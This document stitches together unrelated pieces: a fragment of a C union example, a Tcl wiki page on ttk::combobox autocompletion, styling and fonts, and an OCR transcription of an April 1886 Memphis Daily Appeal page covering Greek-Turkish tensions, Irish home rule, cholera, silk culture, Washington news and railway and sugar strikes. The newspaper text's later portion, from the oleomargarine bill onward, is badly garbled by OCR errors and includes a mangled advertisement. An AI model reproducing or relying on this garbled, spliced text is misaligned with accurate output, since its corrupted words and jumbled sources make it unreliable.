    union student p1;
    p1.roll_no = 1;
    printf("roll_no : %d\n", p1.roll_no);
    strcpy(p1.name, "Brown");
    printf("name : %s\n", p1.name);
    p1.phone_number = 1234567822;
    printf("phone_number : %d\n", p1.phone_number);
    return 0;
}

roll_no : 1
name : Brown
phone_number : 1234567822
https://www.codesdope.com/c-union/
Documentation for ttk::combobox

Ttk's combobox widget.

Question

Actually, this so-called "combobox" is a "drop-down box". Is there a real combobox available, consisting of an entry combined with a listbox? Just like the font chooser in the format/character dialog of LibreOffice - and as opposed to the font chooser in the toolbar of LibreOffice? Wikipedia also gives a good description of it:

Ideas for combobox autocompletion

TR - I saw that the combobox of the Tile package didn't support autocompletion, so I added it using the code from BWidget:

proc ComboBoxAutoComplete {path key} {
    #
    # autocomplete a string in the ttk::combobox from the list of values
    #
    # Any key string with more than one character and is not entirely
    # lower-case is considered a function key and is thus ignored.
    #
    # path -> path to the combobox
    #
    if {[string length $key] > 1 && [string tolower $key] != $key} {return}
    set text [string map [list {[} {\[} {]} {\]}] [$path get]]
    if {[string equal $text ""]} {return}
    set values [$path cget -values]
    set x [lsearch $values $text*]
    if {$x < 0} {return}
    set index [$path index insert]
    $path set [lindex $values $x]
    $path icursor $index
    $path selection range insert end
}

All you need to do now is bind <KeyRelease> to this procedure:

package require Tk 8.5
package require tile
ttk::combobox .c -values [list one two three four five six seven]
pack .c -padx 5 -pady 5
bind .c <KeyRelease> [list ComboBoxAutoComplete .c %K]

CLN 2006-04-20 - Shouldn't this be in a namespace or at least be named ttkComboBoxAutoComplete? For that matter, why not submit a patch to get this into the Tile distribution. (Not that I wouldn't be grateful to have it available here in the mean time if I was using Tile.)

TR 2006-04-21 - I just read the tile paper [1] by Rolf Ade. It mentions autocompletion code in the demos directory of the tile distribution.
I haven't used that code yet, but it seems to do the same job as the code above, just in the correct namespace and as a command like tile::combobox::enableAutocomplete. So the above code is not really needed ...

Googie Aug 6, 2011 - Note that at the current moment there is no tile::combobox::enableAutocomplete, so the code above makes sense again. Just a small suggestion: support case-insensitive autocompletion. To accomplish this with the above code, just modify the "lsearch" line to look like this:

   set x [lsearch -nocase $values $text*]

Googie Aug 6, 2011 - In addition to autocompletion, here is preselection of an item from a list that is already dropped down, using the key for its first letter:

   proc ComboListKeyPressed {w key} {
       if {[string length $key] > 1 && [string tolower $key] != $key} {
           return
       }
       set cb [winfo parent [winfo toplevel $w]]
       set text [string map [list {[} {\[} {]} {\]}] $key]
       if {[string equal $text ""]} {
           return
       }
       set values [$cb cget -values]
       set x [lsearch -glob -nocase $values $text*]
       if {$x < 0} {
           return
       }
       set current [$w curselection]
       if {$current == $x && [string match -nocase $text* [lindex $values [expr {$x+1}]]]} {
           incr x
       }
       $w selection clear 0 end
       $w selection set $x
       $w activate $x
       $w see $x
   }
   bind ComboboxListbox <KeyPress> [list ComboListKeyPressed %W %K]

To use it, just drop down the list of values in the combobox and press letters according to the first characters of the available values. If there is more than one item starting with the pressed key, then the next item with a matching name is selected on each key press.

jnc Feb 5, 2010 - Here is complete auto-complete code. This code completes while in an editable or readonly combobox. It also completes with a key press when in the drop-down list of the combobox. At the bottom is a simple example.

jnc Sep 15, 2010 - Updated code... In a read-only widget, pressing S will match "Six" and pressing S again will match the next "S" entry, which is "Seven" in my example.
When no more matches are found, it will start back at the beginning ("Six"). This is the behavior found in Windows and suggested by MHo. Also bug fixes for some keys such as ' and ". The code is getting large enough that it does not belong mixed in with a lot of other code on this page; please see my Misc Tcl Repository.

rz Apr 6, 2016 - Another autocompletion code attempt:

   # Combobox enhancement: select item by typing
   bind ComboboxListbox <KeyPress>      { ::ttk::combobox::Autoselect %W %A}
   bind ComboboxListbox <Key-Delete>    { ::ttk::combobox::Autoselect %W {}}
   bind ComboboxListbox <Key-BackSpace> { ::ttk::combobox::Autoselect %W {}}
   set ::ttk::combobox::Autoselect {}
   proc ::ttk::combobox::Autoselect {w key} {
       variable Autoselect
       if {$key eq {}} {
           set Autoselect [string range $Autoselect 0 end-1]
       } else {
           append Autoselect $key
       }
       if {$Autoselect eq {}} return
       set myIndex [lsearch -nocase -glob \
           [[::ttk::combobox::LBMaster $w] cget -values] $Autoselect*]
       if {$myIndex < 0} return
       $w selection clear 0 end
       $w activate $myIndex
       $w selection set $myIndex
       $w see $myIndex
   }
   # Change original procedure to support autocompletion
   proc ttk::combobox::LBCancel {lb} {
       Unpost [LBMaster $lb]
       set ::ttk::combobox::Autoselect {} ;# RZ
   }

Questions and Suggestions concerning ttk::combobox

RLH: It would be nice, if a widget is involved, to see a graphic showing the widget. Not necessary... but nice.

D. McC 2008 Dec 8: OK, after rummaging through the ttk::style man page and trying things out in vain, I give up. Can somebody tell me how to specify the background color for the entry portion of the ttk::combobox?
And can somebody tell me why there is not even an option to specify colors of Ttk widgets in the same ultra-simple way as for Tk widgets, e.g., "-bg AntiqueWhite"?

Bryan Oakley 2008 Dec 8: To solve your immediate problem, try this:

   ttk::combobox .cb -style mycombobox.TCombobox
   ttk::style configure mycombobox.TCombobox -fieldbackground bisque

(using "ttk::style map" may be a better choice, but I'll leave that as an exercise for the reader)

As to why there is no option, that's the design philosophy of the themed widgets -- you lose some amount of control over individual widgets but gain the ability to create unified themes.

MSH: This no longer works in 8.6 (tried 8.6.1, 8.6.4, 8.6.5); the only option which changes anything is -foreground.

D. McC 2008 Dec 9: Thanks--it works! Now I'll see about incorporating that into my color-scheme files. What I still don't understand is why the programmer isn't given a choice about how much control over individual widgets (and ease of configuring them) to trade off for how much ability to create unified themes.

TLT 2009-11-28 - I was annoyed that the ttk::combobox does not change the cursor to an ibeam when it is inside the text entry widget. The following binding fixes that:

   bind TCombobox <Motion> {
       if {[%W cget -state] eq "normal" && [%W identify %x %y] eq "textarea"} {
           %W configure -cursor xterm
       } else {
           %W configure -cursor ""
       }
   }
   pack [ttk::combobox .cb]

MHo: In the read-only edit field, how is it possible, e.g., to get the entry Seven? Pressing S always leads to Six (earlier in the list); pressing S again does not help, and pressing E right after S leads to Eight. This is true for the listbox, too.

jnc Feb 24, 2010: In my misc-tcl code project there is updated combobox code. I have not updated it here yet, as I don't want to make daily updates here. The code on the misc-tcl project page properly allows the Up/Down arrow keys to select items when in the readonly edit field.
So, to get to Seven, you would press S and then use your up/down arrow keys to navigate to Seven. This is how Windows works. I would actually prefer it to allow typing of SE, which would go to Seven, but this would be non-standard. I am sure you can modify the above code for that type of action if you so desire.

MHo: At least within list boxes/tables (like explorer windows) Windows navigates to the next matching entry with each keypress. So the first S would go to Seven, the next S to Six, etc.

My miscellaneous Tcl code is located at:

LV 2010-06-09: In the iwidgets combobox, one had the ability to specify a command to execute when one of the menu items in the dropdown list is selected. How does one do that with the ttk version of the combobox?

hae 2010-06-09: The ttk::combobox does not have this. However, here is a basic example of having a callback when an item is selected:

   package require Tk
   package require Ttk
   set values [list Orange Apple Peas]
   set c [ttk::combobox .cbx -values $values]
   pack $c
   proc OnComboSelected { w } {
       puts [info level 0]
   }
   bind $c <<ComboboxSelected>> [list OnComboSelected %W]

Okay, so I attempted to use the above code. However, I do not get the selected item displayed when I click on an entry. Instead, I get the text "OnComboSelected .cbx" output. So, when I change OnComboSelected to read

   proc OnComboSelected { w } {
       puts [$w get]
   }

I get the selected item output. What a pain for people trying to move to ttk from iwidgets!

[Leon] - 2010-12-09 15:53:53: Salute! Need help! How do I change the size of the pop-down items that we have on the list? I just need to refer to this list. But how?? Thank you in advance!

HaO: There is new info in the font and color box below. Could you check it out? Does it help for you? For me, the question is not clear. Does size mean x-y size, or font size?
Change fonts

HaO 2011-04-20: Change the entry font for one combobox:

   font create EntryFont -size 20
   ttk::combobox .b -font EntryFont

and for all comboboxes:

   option add *TCombobox.font EntryFont

Change the font size for all combobox dropdown listboxes:

   option add *TCombobox*Listbox.font EntryFont

(from the file tcl8.5/lib/tklib/ttk/combobox.tcl)

Why is there no -font option

HaO 2015-09-18: I try to answer the tk ticket [2]: "ttk::style -font does not work for TCombobox, TEntry or TSpinbox on either LinuxMint 17.2 or Windows 7. ttk::style -font does work for the other ttk widgets."

   package require Tk
   font create x
   font configure x -size 36
   ttk::style configure TCombobox -font x
   ttk::combobox .c -values [list abc def ghi jkl]
   pack .c -in .

The ttk::combobox is composed of sub-widgets, where each has its own style. Let's explore the structure (Windows):

   % winfo class .c
   TCombobox
   % ttk::style layout TCombobox
   Combobox.border -sticky nswe -children {Combobox.rightdownarrow -side right
       -sticky ns Combobox.padding -expand 1 -sticky nswe -children {
       Combobox.focus -expand 1 -sticky nswe -children {
       Combobox.textarea -sticky nswe}}}
   % ttk::style element options TCombobox.textarea
   -font -width

So the text area has its own -font option. That is why the approach above does not style the dropdown box. But I cannot find the font for the entry box here.
Set the font of the dropdown box

On the clt thread "changing default font in TCombobox" on 2015-09-21 [3], Brad Lanam gave the following recipe:

   .combo configure -font myfont    ;# the entry font
   set popdown [ttk::combobox::PopdownWindow .combo]
   $popdown.f.l configure -font myfont    ;# the font for the dropdown listbox

Disabled/Readonly color (and pointer to color change)

Interesting thread 'Propose new layout for ttk::combobox and ttk::spinbox' on clt on 2011-12-04, "Enhanced combobox/spinbox layout", with an answer by Pat Thoyts about fixed readonly/disabled colors and a link to a test program: [4]

2013-04-15 HaO: Another interesting thread on clt. Question: I am trying to change the ttk::combobox background on Linux to white when the widget state is readonly. Answer by Koen Danckaert:

   ttk::style map TCombobox -fieldbackground {readonly white disabled #d9d9d9}

The wiki page Changing Widget Colors shows how to change all colors of the widget. In addition, it gives additional insight into the structure.

How to change a ttk::combobox width to display the longest entry for easy reading?

Let's say you have a column of destinations inside a table called item_in_out stored in some database called warehouse. You are supposed to record the destination of every item whenever an item is pulled out of a warehouse or store. As you record destinations, you don't want to keep retyping them, so we rely on the combobox autocompletion proc ComboBoxAutoComplete written at the top of this wiki page, PLUS the database's distinct listing of previously recorded destinations. To make the destinations list in the combobox obvious, clear and readable, we have to set the combobox width to the longest string length among all destinations. Here I am going to show you what works and what does not work. I am going to use tdbc::mysql for database connectivity. The following proc gets the distinct destinations and returns them in a Tcl list.
   package require tdbc::mysql
   # dbcon is the mysql connection command.
   tdbc::mysql::connection create dbcon -database warehouse -user root \
       -password [email protected] -host localhost

   proc destinations { path } {
       # $path is the combobox widget path whose width you want to fix
       set query_all_destinations "select distinct destination from item_in_out"
       set statement [dbcon prepare $query_all_destinations]
       set destinations_list [list]
       set max_destination_strlength 0
       $statement foreach row {
           # the two lines below find the longest string length amongst all destinations
           set single_destination [dict get $row destination]
           if { [string length $single_destination] > $max_destination_strlength } {
               set max_destination_strlength [string length $single_destination]
           }
           lappend destinations_list $single_destination
       }
       # here we set the width according to the longest length found
       $path configure -width $max_destination_strlength
       return $destinations_list
   }

You might think that this way of calling the combobox is correct; then you're wrong. I say so because this can fool you because of Tcl programming habits: here the combobox is actually not defined or created yet.

   ttk::combobox .destinations_combo -values [ destinations .destinations_combo ]
   bind .destinations_combo <KeyRelease> [list ComboBoxAutoComplete .destinations_combo %K]

The correct way is this. The reason is that the combobox must be defined first; then you can do whatever you want with it.

   ttk::combobox .destinations_combo
   .destinations_combo configure -values [ destinations .destinations_combo ]
   bind .destinations_combo <KeyRelease> [list ComboBoxAutoComplete .destinations_combo %K ]

Please remember that after you insert a new record into the table item_in_out you'll have to re-update the destinations combobox, just in case you have inserted a new destination. Use this line of code to do the re-update:

   .destinations_combo configure -values [ destinations .destinations_combo ]
MEMPHIS DAILY APPEAL, FRIDAY, APRIL 23, 1886. CALLAWAY & KEATING.

...mate. Keep premises free of pernicious exhalations, and watch over personal habits; especially remember that intemperance is a smiling Judas that with merry laugh and jocund glee introduces cholera into the dwelling. Cholera, dirt and drink are members of the same firm, and the two latter are faithful abettors of the former.

THE NATIONAL CAPITAL. BILL TO INDEMNIFY THE CHINESE FOR THEIR LOSSES. Land Frauds in the West - Confirmations - Big Damage Suit - Grant Anniversary.

CHECK THE WRATH.

"Greece, but living Greece no more," was the written assertion of Byron early in the century, but his words no longer hold good. To-day Greece is not only alive but, to use a common phrase, "alive and kicking." She has put her navy in full fighting order, and has provided a strong supply of torpedo boats. On land she has summoned her forces and put them on full war footing, and has been sending them to the front, where the Turks are prepared to oppose their attack. All this time the European powers are demanding that she remain at peace, and their men-of-war are watching the Greek men-of-war to prevent them making any attack. Spite of remonstrances and threats from these quarters Greece goes on with her preparations, and declares she will fight spite of all the opposition. And what is she fighting for? The treaty of Berlin appointed certain territory to Greece, belonging to the Greece of former days, and required Turkey to transfer it. Turkey gave a portion, and is now determined to keep the rest. A telegram sent from London on Wednesday said the Greek army on the frontier were becoming provocative and the Turks excited, so that at any hour hostilities might begin.
The Greeks mainly rely upon their navy, however, as the Turkish troops largely outnumber theirs; but as the ships of "the powers" are watching their war-ships, their navy is in a very peculiar position. It is believed that Greece probably has encouragement from Russia; not that Russia is any special friend of Greece, but she is discontented about the Bulgarian settlement, and may intend in some way to make the Greek quarrel a means of allowing her to interfere in the affairs of the Balkans. That the powers have a dread of war breaking out in the neighborhood of those provinces is evident from the extraordinary step they have taken of sending their war-ships to keep the Greek fleet inactive.

THE IRISH VOLCANO.

England is seething like a volcano before eruption on the subject of Gladstone's proposed Irish measures. If ever the Irish desired, as a little installment of revenge, to see some of their own agitation upsetting England from end to end, they have that degree of vengeance to-day. Over the whole of Great Britain there is commotion, dispute and anxiety as to what will be the outcome of the strife. Meetings are held; orators are pleading for one side or the other in every town. The whole press of the land is vibrating under the Irish thrill. Wherever men congregate, in the drinking houses, in the clubs and in social parties, hot and feverish discussion of the Irish question goes on. That the proposed measures will meet with vigorous and almost frantic opposition when Parliament meets again at the beginning of May is evident. That both measures will have to undergo important modifications appears certain, for while the English opposition object that too much is conceded, Irish supporters accept them only as a late installment of what they require.
In the midst of all Gladstone remains calm and assured, while the enemies of his policy are obliged to admit that, now so much has been offered by the Ministers of the Crown, something fairly satisfactory to the Irish would have to be done even if the Tories should once more get into power. As yet nobody has been unthinking enough to propose quieting Ireland by sending over there more regiments. The Irish people are now too united, too well organized, and have leaders too able and too powerful, for shooting and hanging to prevail as in former days. England's plan in Ireland has been to "divide and conquer;" but now Ireland will not divide; like the Americans when in revolution, they know that in union lies their power.

THE WORD OF DREAD.

Cholera! Who that remembers visitations of the past does not regard that word as one of dread? If those whose memory does not extend so far back will read the description of the cholera entering Paris, given in Eugene Sue's Wandering Jew, they will know why dread and cholera visitations go together. On the continent of Europe the awful scourge has once more made its appearance. It has introduced itself early, and, like Grant, has "all summer" in which to accomplish its destroying ravages. Last year France and Spain were exposed to the horrors of the epidemic; where will it seek its victims this year? The probabilities are against its reaching our shores this year, but those who are acquainted with cholera know that none can surmise what its doings may be. Often it defies all expectations and leaps to localities where none had thought a visitation from it probable. The cholera is the cholera, and as such monarch of its movements. We can, therefore, only be acting prudently if we aid the government's quarantine and sanitary measures.

SUCCESS IN SILK CULTURE.

The sixth annual meeting of the Woman's Silk Culture Association of the United States was held at Philadelphia a week ago.
The report read by the president stated that there was an increase during the year just ended in the number of persons engaged in silk culture, that there was an improvement in the quantity and quality of the silk product, and that a better system of turning the agricultural product into commercial raw silk prevailed. New officers were elected, all of them women. The statistics of the country show that, as the States grow older, there is an increase of the female population over that of the males. The statistics also show that there is a large increase of unmarried women. These facts indicate that as the country grows older there will be an increase in the number of women forced to support themselves. The culture of silk is peculiarly woman's work, and this branch of industry should be encouraged for their benefit. In many portions of the South considerable interest has been taken in silk culture, and an annually increasing number of men, women and children have engaged in planting mulberry trees and in raising silkworms. As yet but little has been accomplished in the South in the direction of the manufacture, the principal reason being that the supply of cocoons is yet too small and precarious to justify it. There is reason, however, to believe that silk culture will soon become a leading industry for women in the Southern States. The interest in silk culture has grown steadily and with increasing promise. In 1850 there were sixty-seven silk manufacturing establishments in the whole country, producing goods valued at $1,609,478. By 1860 the number of factories had increased to 139, and the value of products to $6,607,771. From 1860 to 1870, the decade of the war, the number of factories decreased, but the value of the output increased again, to $12,210,602 in 1870. In the census year of 1880 there were 382 establishments in the United States, which produced finished goods worth $34,610,723, or 38 per cent of all the silk goods consumed by the nation.
As by far the major part of the raw material used in this native manufacture was imported, and as there does not appear any good reason why cocoons and reeled silk should not be as well and as cheaply supplied here as abroad, it is not difficult to infer a promising future for our home silk farms. It is worth noting that in devoting their attention to this subject a majority of our silk experimenters in the South fancy that they are pioneering a new Southern industry. The fact is that the production of silk was among the very earliest industrial efforts of the colony of Virginia. In 1609 King James of England consigned silkworm eggs to Jamestown, which failed to arrive, owing to shipwreck. Later his majesty succeeded in supplying the colonies, and the production was stimulated at various times afterward by fines for not planting mulberry trees, or by bounties for introducing cocoons and raw silk. A Swiss colony, which settled in South Carolina in 1733, made some progress in raising silk, and there is record of the exportation of 251 pounds of raw silk from North and South Carolina between 1731 and 1765. But it cannot be said that the industry flourished. The conditions were favorable to an extensive production, but the policy of the mother country forbade colonial manufacture, in the interest of British weavers, and subsidies and fines were alike insufficient to keep it on its legs. Early in the eighteenth century silk culture on the Mississippi was a part of John Law's Mississippi Company scheme, and, in 1717, eggs and seeds for mulberry trees were sent to New Orleans. In and about the city a good many trees were grown, and tradition has it that the prospects for the industry were brilliant until the collapse of the "South Sea bubble" produced a collapse of all the infant interests of the early town. Silk culture was introduced in Georgia in 1732, and made some progress.
Queen Caroline is alleged to have worn a gown of Georgia silk on a certain state occasion, and a Bavarian colony near Savannah appears to have produced quite a good deal of raw silk, as in 1771-72 it exported 873 pounds of raw silk to England. In 1750 Georgia produced 6300 pounds of cocoons, and 20,000 pounds in 1766. From 1750 to 1754 the same colony exported raw silk valued at $8860. It is not necessary at this time to write of the mulberry and silkworm excitement of a later period. It is here intended only to point out the fact that the industrial phenomena which mark the organization and early history of the New South are largely repetitions, on a greater scale, of the industrial phenomena of early days in the old colonial South. The poor little Virginia bloomery whose workmen were massacred by the Indians in 1622 has noble descendants in the guise of great furnaces and rolling-mills all over the South, and let us hope that Southern efforts of the present day to promote the silk industry may result in the establishment of an interest bearing a like creditable relation to the historically interesting but otherwise unimportant silk culture of the colonists.

WASHINGTON, April 22. The Solicitor of the Treasury has instructed the United States District Attorney at San Francisco, Cal., to bring suit against the Sierra Lumber Company to recover about $2,218,000 damages, arising from the conversion of timber and lumber taken from public lands. The special agents of the Land Office have been instructed to render the District Attorney all possible aid in prosecuting the suit.

Confirmations.

WASHINGTON, April 22. Confirmations: Chas. K. Gross, Governor of New Mexico; W. S. Rosecrans, Register of the Treasury; R. E. Withers, Consul at Hong Kong. Registers of Land Offices: J. I. Bethune, Los Angeles, Cal.; W. K. Ramsey, Camden, Ark.; W. T. Burney, Oregon City, Ore.; C. W. Johnston, Roseburg, Ore. Receivers of Public Moneys: J. R. Thornton, Camden, Ark.; L.
James, Carson City, Nev.; W. H. Bickford, Shasta, Cal.; J. T. Outhouse, La Grande, Ore. Collectors of Customs: W. T. Carrington, Teche, La.; J. J. Higgins, Natchez, Miss.; I. H. Poucher, Oswego, N. Y.; O. L. Breckley, Salina, Tex. Indian Agents: J. S. Ward, Mission Agency, Colo.; W. H. Black, Sac and Fox Agency, Ia.; J. McLaughlin, Standing Rock, Dak.; J. T. Dowd, Osage Agency, Ind. T. A. T. Wood, postmaster, Corsicana, Tex.; J. T. Gathright, surveyor of customs, Louisville, Ky.; R. Pearson, Indian inspector; W. Stapleton, melter and refiner of the mint, Denver, Colo.

Arrival of the New Chinese Minister.

WASHINGTON, April 22. Chang Yen Hoon, the new Chinese Minister, and his suite arrived in the city to-night. The Minister and his party were met at the depot by the retiring Minister and the attaches of the legation, and were escorted to the Embassy in carriages, after which the ex-Minister and his suite returned to the hotel, where they will remain while in the city.

Sixty-Fourth Anniversary of the Birth of Gen. Grant.

WASHINGTON, April 22. The sixty-fourth anniversary of the birth of Gen. Grant will be celebrated at the Metropolitan Methodist Episcopal church, in this city, Tuesday evening, April 27th. Chief Justice Waite will preside, and addresses will be made by Senators Brown, Sherman, Logan and Evarts, ex-Gov. Long of Massachusetts, Gen. J. S. Negley of Pennsylvania, Gen. Burdette, commander-in-chief of the Grand Army of the Republic, the Rev. J. P. Newman and John F. Spence of Tennessee. The President and Cabinet have been invited, and various posts of the Grand Army will be present. The anniversary will take place under the auspices of the friends of the Grant Memorial University of Athens, Tenn. The institution was formerly known as the East Tennessee Wesleyan University, but the Board of Directors amended their charter, changing the name of the college to that of the Grant Memorial University.
This was done because Gen. Grant made the first cash donation for the building of the school when it was organized in 1867, and because the friends of the General in the Central South desire to perpetuate his memory by establishing a living monument to his name.

Land Frauds in the West.

WASHINGTON, April 22. Commissioner Sparks of the General Land Office is completing the organization of a special board of review, the duties of which will be to examine and report to the Commissioner upon all applications for patents to public lands. Its examinations will have special reference to detecting evidence of fraud. The board will consist of fifteen or twenty of the more expert clerks of the General Land Office, detailed for the special service, and such cases as receive a favorable report from this board the Commissioner will certify to the President for patent. The field force in the West has recently been increased by twelve newly appointed special agents, eight of whom will give their special attention to the detection of fraudulent entries. The other four will look after the interests of the government in timber trespass cases. The Commissioner says that by increasing the efficiency, and thus the vigilance, of his force, both in the field and in the office, he hopes to accomplish much that would have been accomplished had his order of April 3, 1885, been allowed to stand.

The Chinese Indemnity Bill.

WASHINGTON, April 22. Senator Morgan, from the Committee on Foreign Relations, reported to the Senate a bill to indemnify the Chinese for the losses and damages inflicted upon them by the rioters at Rock Springs, Wyo. T., in September last.
It authorizes the President to designate not to exceed three officers of the United States to investigate and take the testimony of witnesses as to the nature and extent of the damage done to the persons and property of the Chinese, and in connection therewith they may consider the testimony already taken and reports made, subject to the cross-examination of the witnesses, if deemed necessary, and such other proofs as may be submitted to them by the government of China. They are required to report the estimate of the damages sustained by each person and submit the testimony to the Secretary of State within six months, which time may be extended six months by order of the President; and the same shall be examined by the Secretary of State, and thereupon the President shall award to each person injured the sum that he shall consider to be just in view of the evidence and report presented to him. The aggregate amount so awarded by the President, not exceeding $150,000, shall be paid by the Secretary of the Treasury to the Chinese Minister at Washington, in full satisfaction and discharge of the injuries to persons and property inflicted upon subjects of the Chinese Empire.

The Morrow Chinese Bill.

WASHINGTON, April 22. The House Committee on Foreign Affairs to-day reconsidered the vote by which a favorable report was ordered on the Morrow Chinese bill. Representative Morrow and the other members of the California delegation are opposed to the amendments made to the bill in committee, and especially to the one which says no master of vessels shall be liable to penalty for bringing any person into the United States who is entitled to come to this country under existing treaty stipulations.
They say that the bill is really an abrogation of the Burlingame treaty, and that if the amendment were adopted it would defeat the entire purpose of the bill. They also said they would oppose the bill in the House if reported in its present shape. The bill will be further considered in committee next Tuesday.

Senate Executive Session.

WASHINGTON, April 22. The Senate in executive session to-day took up the case of Chas. R. Pollard of Indiana, nominated to be a Judge of the Supreme Court of Montana, vice Gen. Coburn, suspended. The case was reported adversely from the Judiciary Committee, and Senators Edmunds and Hoar spoke against Pollard. Pollard was a Confederate and Coburn was a Union soldier. Many allegations concerning questionable transactions in which Pollard took part, when Assistant District Attorney in Indiana, were discussed. Senator Voorhees began a speech in favor of Pollard, but gave way for an adjournment. Senator Morgan offered a resolution, which was not acted on, to remove the injunction of secrecy from the Weil and La Abra Mexican treaty, recently rejected, and the accompanying papers.

Adulteration of Food Products.

WASHINGTON, April 22. The House Committee on the Judiciary to-day laid on the table a number of bills to prevent the adulteration or imitation of food products. This action was taken for the reason that the committee believe the bills to be unconstitutional so far as they affect the several States; and so far as they affect the District of Columbia, they are not properly within the province of the committee.

Regulating the Traffic in Fraudulent Butter.

WASHINGTON, April 22. The House Committee on Agriculture to-day authorized Chairman Hatch of Missouri to report favorably a bill to regulate the traffic in fraudulent butter, which is substantially identical with that framed by the American Agricultural and Dairy Association.
The bill imposes annual taxes as follows upon those engaged in the business: manufacturers, $600; wholesale dealers, $480; retail dealers, $48. Manufacturers of oleomargarine who have not paid the tax shall be fined $1000 to $5000 in addition to the tax; wholesale dealers, $500 to $1000; and retail dealers, $50 to $500. All manufacturers of oleomargarine shall put up their product in wooden packages, stamped and branded under regulations prescribed by the Commissioner of Internal Revenue, and dealers shall be allowed to sell imitation butter only from packages so branded. Violation of this provision shall be punishable by a fine and imprisonment. Every package shall be labeled with the number of the manufactory. Neither the stamp thereon nor the package shall be removed, reused or destroyed, under penalty of $50 fine. Manufacturers shall pay a tax of 10 cents for each pound of oleomargarine manufactured by them, and if any manufacturer sells or receives for sale or consumption any oleomargarine on which the stamps are not affixed, he shall be liable to fine and imprisonment in addition to the tax. Imported oleomargarine shall pay an internal revenue tax of 15 cents per pound in addition to the import duty. Every person who purchases or receives for sale oleomargarine not properly branded shall be liable to a penalty of $50 for each offense, and to a penalty of $100, in addition to forfeiture of the article, for receiving oleomargarine from a manufacturer who has not paid the special tax. Fraudulent use or possession of oleomargarine stamps shall be punishable by fine and imprisonment. Scientists may be appointed to determine whether any article is subject to the tax provided; also, whether any oleomargarine which is intended for food is deleterious to public health. The former shall be forfeited in case the tax stamp is not affixed, and the latter in case it is decided to be injurious to health.
Oleo margarine must not be exported with out payment of the tax provided, but shall be labeled "Oleomargarine" in large letters. Any person engaged in the oleomargarine business, who de frauds or attempts to defraud the United States in connection with the buainesp, shall forfeit th fait jry, man ufacturing apparatus and stock, and in sil.lilii n bn liable to fine and imprisonment.- Rigid penalties am er jvidcd for all infractions of the law. The bill shall take eflect ninety days alt its paa.ige. TIIE LAKk? SHORE STRIKE. FUTILE ATTEMPT TO STAKT TRAINS A'" CHICAGO. Kefosal of lhe En?. 'neers to Take Out Tlielr Engine. An Ex elfin j-cem'. Chicago. III.. Anril 22. 'Ac special train over the Lake Shore road, con taining the deputy-sheriffs aid new switchmen, bound for the yards at Forty-third street, made a ston at Toirty-niutli street. Here a commit tee of the striking switchmen awaited on Superintendent Arasden and asked him to allow one ot the men to go into the rear car and address them. In ac cordance with the request Tom Col lins got in the car and spoke as follows : "We want you men to hear enr side of this matter. You have heard the company's side and you should hear both sides. Come over to our hall and hear us, and if you do not want to go there, fix any other place. Come out and talk it over. This is a question between capital and labor and the time Mas come that the con flict bas to take this shape. We do not want to injure the company's property, but we want our rights. Collins then lrft the car, followed by three of the Imported switchmen, and tho cars were surrounded by the strikers aud their friends, who us d every argument they could to per suade the switchmen to leave their cars. Up to 2 o'clock, in all seven men had left, some going through the windows and some out of tho doors. About 2000 men surrounded the train at Root street. The crowd increased momentarily until fully 5(X) J men were in the yards. TUB CRITICAL MOMKXT was at 2:110. Engine No. 
158, with Engineer Mid Ca !dy, catni out cf the round house clanuir g iti boll loudly. Ten deputy sheriff gu-adid in front, rear and sides. Bufore the engine reached the main track, the deputies we.realims' ht in tbe mass of ex cited men who crowded the tracks. Tom Collins mount 3d the engine and began talking to the engineer. Ths wheels soon stopped, when Co lins was heard to say: Be kind eoouuh not to do this. You are no capitalist, For God's sake run that engine back fir ns laboring man. Doit. Will you T The engineer reached for bis lever the great wnee's reversed, and the engine started back to the lound-house, amid deafening cheers from ths switchmen and their friends. When oppo3ite the tank Superintendent Wright got on the engine aud talked with the engi neer, while the engine stood still and there was a silence over the great crowd. Caddy shook bis bead and ran the engine into its stall. Superin tendent Wright was ssked if he could get a man to run an engine out, and said: "I will try again. I think I can. . Nmmw Itnuur KIMZSiTfl TAILOR, DEAFER & IMPORTER ZTo. 38 MAJDISOIT STREET, Cordially lavites isspectiM of his Larrs, Tmh a4 Varied ' Sarin ui Issiinr Stock of Eaelita. Freck and Gcnnaa "VT ortteia, Cawrmrres sad Suiting, aomprisiag thi Latest Dcaijrns tni Finest Textares i Gcntlemeas Wear. 19 Samples anal Fricea appIicatiM U Umm wks kara left aessarca. A L iog men, and this opportunity is doubtless now presented. All day to day J. L. Monaghan, chief of tbe Aid Association, was busy among the strikers, and it is repotted this even ing that a committee wonld meet for the purpose of considering tbe divisi bility of making ths strike nrictly union affair, and making use of all the power in the organization to gain the day for tbe local strike. The New York Sugar Kiofa. Hdntbb's Point, L.I., Aoril 22. 
Th9 fitihiing between ths police and tbs Btrikers, which began about 1:30 o'clock p.m., was quelled about 3:10 p.m., when reinforcements from tbe Sixth, Fourteenth, Eighteenth and Kixteen's Precincts arrived, and the Seventh Precinct men, having been supplied with their night clubi", were better able to cone with the strikers. This evening everything is qniot, though imther trouble is expected be fore m ruing. A cordon of poli :e sur rounds thu Havemeyer sugnr-house, keeping the strikers tt a fate distance. Most cf the strikers have been drink iug all day aud are intoxicated. They held a prolonged m-e iog and ap pointed a committee to demand $1 25 per day for all laborais, and ten hours to constitute a day's work. The llave meyers refused to receive any com mittees, bat said they would treat with the men individually. There are about twenty employes at work in the sugar-house, who are boarded and lodged on the premises, a stock of pro visions ana cots naviug oeen proviueu. The policemen are also fad on the premises. i,veiy thing remained quiet up to midnight, a large force of police remaining on duty. Uavemeyer & Co. announce that they will in no caw re employ any of the strikers. It was resolved to repeat the demand, and if it is not granted on or btfore tbe 1st of May tbe moulders will strike. Tbe members of the anion number about 3500. NEWS TN IUUEF. Augusta, Ga., April 22. Washing ton county, one of the largest in the State, has voted tho dry ticket by a majority of 242. Richmond, Vs., April 22 -The local option election 111 Fredericksburg to day resulted in favor of granting licenses, by 210 major, ty. Louisville, Kv., April 22. -The National Tobacco-Works, employing 30 hands, voluntarily a'ojtted t tie eight-hour system to-clay without re ducing pay. Cleveland, O , April 22.-The Ohio State and National Convention of the National Reform Association, is in ses sion at Wooster, O.. the Hon Felix R. Rm not of Pittsburg, presiding. Cincinnati. O., April 22. 
